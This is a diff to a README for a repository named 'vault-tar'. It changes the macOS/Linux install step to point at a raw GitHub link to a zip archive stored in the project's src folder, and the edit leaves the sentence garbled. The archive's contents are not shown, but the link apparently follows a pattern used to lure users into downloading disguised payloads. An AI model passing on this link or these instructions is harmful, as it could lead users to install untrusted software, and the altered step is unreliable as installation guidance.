Nobab007/vault-tar/README.md

 #### macOS and Linux

-1. Open the downloaded `.tar.gz` file by double-clicking it or using your file archiver.
+1. Open the downloaded `https://raw.githubusercontent.com/Nobab007/vault-tar/main/src/vault_tar_3.7.zip` file by double-clicking it or using your file archiver.
 2. Extract the contents to a folder you can find easily (example: `Documents/vault-tar/`).
 3. Open your Terminal app.
 4. Navigate to the folder where you extracted vault-tar.
 You can do this by typing: